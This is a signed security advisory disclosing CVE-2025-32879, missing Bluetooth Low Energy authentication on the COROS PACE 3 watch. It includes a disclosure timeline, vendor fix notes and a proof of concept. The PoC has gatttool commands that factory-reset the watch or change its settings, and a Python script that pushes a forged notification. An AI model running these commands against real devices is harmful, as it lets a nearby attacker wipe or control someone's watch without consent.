-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2025-026
Product:                   COROS PACE 3; other models might also be affected [6]
Manufacturer:              COROS Wearables, Inc.
Affected Version(s):       <= V 3.1008.0
Tested Version(s):         V 3.0808.0
Vulnerability Type:        Missing Authentication for Critical Function (CWE-306)
Risk Level:                High
Solution Status:           Fixed
Manufacturer Notification: 2025-03-14
Solution Date:             July/August (see vendor notes[6])
Public Disclosure:         2025-06-17
CVE Reference:             CVE-2025-32879
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The COROS PACE 3 is a professional GPS sport smart watch.

The manufacturer describes the product as follows (see [1]):

"Improving on its legendary predecessor in every way, PACE 3 packs an 
even more powerful punch. Track your training and recovery with a watch 
that's lightweight and comfortable, with advanced technology, 
outstanding data accuracy, and backed by the industry-leading COROS 
training software system. The COROS PACE 3 paves the way to discover 
your potential."

Due to missing authentication for reading and writing Bluetooth Low Energy
(BLE) services and their characteristics, an attacker within the Bluetooth
range is able to interact with the COROS PACE 3.
This allows completely controlling the device.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The COROS PACE 3 starts advertising if no device is connected via 
Bluetooth. This allows an attacker to connect with the device via
BLE if no other device is connected.

While connected, none of the BLE services and characteristics of the 
COROS PACE 3 require any authentication or security level.
Therefore, any characteristic, depending on their mode of operation 
(read/write/notify), can be used by the connected attacker. 
This, e.g., allows configuring the device, sending notifications,
resetting the device to factory settings or installing software files.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Example #1: device factory reset:
    $ gatttool -b F7:AF:1D:27:03:A5 --char-write-req --handle=0x0019 --value=850001

Example #2: deactivating the do not disturb (DND) setting:
    $ gatttool -b F7:AF:1D:27:03:A5 --char-write-req --handle=0x0019 --value=860000010604111c

Example #3: trigger "find my device":
    $ gatttool -b F7:AF:1D:27:03:A5 --char-write-req --handle=0x0019 --value=b400

Example #4: sending a malicious notification:

####################
import asyncio
from bleak import BleakClient
import sys

DEVICE_ADDRESS = "F7:AF:1D:27:03:b0"
CHARACTERISTIC_UUID = "6e400001b5a3f393e0a977757c7f7f70"
DATA = bytes.fromhex("7900ff0008636f6d2e7769726510064841434b454420176861636b65642062792053795353200000")


async def write_to_ble_device():
    client = BleakClient(DEVICE_ADDRESS)
    try:
        await client.connect()
        await asyncio.sleep(2)  
        if client.is_connected:
            print(f"connected to {DEVICE_ADDRESS}")
            await client.write_gatt_char(CHARACTERISTIC_UUID, DATA, response=False)
            print("Press ctrl-c to disconnect")
            await asyncio.Event().wait()
    except Exception as e:
        print(f"Error: {e}")
    finally:
        if client.is_connected:
            await client.disconnect()

asyncio.run(write_to_ble_device())
####################

Executing the script:
    $ python3 poc.py

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to vendor note [6], the vulnerability was addressed in patches 
for several devices.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-03-10: Vulnerability discovered
2025-03-14: Vulnerability reported to manufacturer
2025-03-14: Confirmation of receipt received
2025-03-17: Asked the manufacturer for an update
2025-03-31: More information provided to the manufacturer
2025-04-07: Asked the manufacturer for an update
2025-04-14: Informed the manufacturer about the assigned CVE-ID and
            asked for an update once again
2025-04-15: Answer received from the manufacturer; manufacturer informed
            SySS GmbH that a fix for the vulnerability is planned for the
            end of the year (2025)
2025-04-15: Receipt confirmed, and the issue was clarified once more, 
            along with a recommendation for prompt resolution
2025-06-17: Public disclosure
2025-08-06: The vendor notified us of updates to the security patch notes
2025-08-11: Advisory update

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] COROS PACE 3 product website
    https://eu.coros.com/pace3
[2] SySS Security Advisory SYSS-2025-026
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-026.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] CVE-2025-32879
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32879
[5] Detailed blog post:
    https://blog.syss.com/posts/bluetooth-analysis-coros-pace-3/
[6] Vendor notes about the vulnerability and security patches:
    https://support.coros.com/hc/en-us/articles/38933102526996-Bluetooth-Security-Vulnerability-Statement

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmiZ3acACgkQrgyb+PE0
i1ON4g/9H4nnHyOOzW8PgtmVrS8tyFSZKKQJ4KtFZxR3mBzDFgrseHJnJA93WrgK
5ueEq/fT3LOcgQKzpZE5XgLS4gS9IAXMVb7nm0rqzqEd9Ihll0Mgn77UI2RzbMWD
JmrCYfeVE9nmKnnkF/BS3a2TjLB1ynUlNHXJ5PuT0D9ZSYXxJ1C9X2cx7w+Zgfrh
iqIILngT1adegwd29OJTg/RgQrisSwGy5uEwWCADrfr5WBrAsxrjZkZuOEew02OT
OaX3DbssBxy2/ncos1r0zdWiEuINu6EQQMBYB66u/y3uPjTRWVcAXZVmFW1wNN7k
Lp2M27bZCqgbCLvS4nadxytrw14GQt4zQbNgfyzMGD4JIFuRBWkIG0WTDn3QnhJn
vcxfTqQ//LMR/s4m+KopMv0zxocE/P3m0SZJMinuogT3Yai5juOU8Hy99GnFXF0M
QWLvxGqGD/l9YupTG1sQsDYfQYn7xHY73V3zm6AipxcGJYk++cVP8jvsyVYpPGib
uFTU08wxi3ve3JgAjjkY5jrFjPQNcpgdkP5QJnZn2IYNLq/9yFbmIRkA40GnilaY
qW8jb3qDIA/OnCFXbijl5UBndL3PCgjdbEMw3ADFtUpgl6dSoD+vR7mNhDa0fx6R
9bzi9W7d4Aj5zUXwiPeBrKdlfVKYD1e3NFMI49jokT+LcDAiM88=
=r72D
-----END PGP SIGNATURE-----